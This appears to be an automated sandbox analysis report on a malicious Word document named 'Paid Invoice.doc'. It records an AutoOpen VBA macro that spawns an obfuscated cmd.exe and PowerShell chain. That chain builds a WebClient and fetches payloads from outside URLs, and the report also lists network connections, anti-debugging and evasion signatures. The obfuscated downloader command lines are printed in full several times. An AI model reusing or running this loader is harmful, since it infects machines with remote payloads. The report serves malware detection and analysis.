Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Paid Invoice[1].doc.1.drOLE, VBA macro line: Sub AutoOpen()
Source: Paid Invoice.doc.usc4tz8.partial.1.drOLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processesShow sources
Source: Paid Invoice[1].doc.1.drOLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice[1].doc.1.drOLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0
Source: Paid Invoice.doc.usc4tz8.partial.1.drOLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice.doc.usc4tz8.partial.1.drOLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 203.195.212.211 443
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 3137
Source: unknownProcess created: Commandline size = 2912
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 3137
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2912

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exeBinary or memory string: Progman
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exeBinary or memory string: Program Manager
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exeBinary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
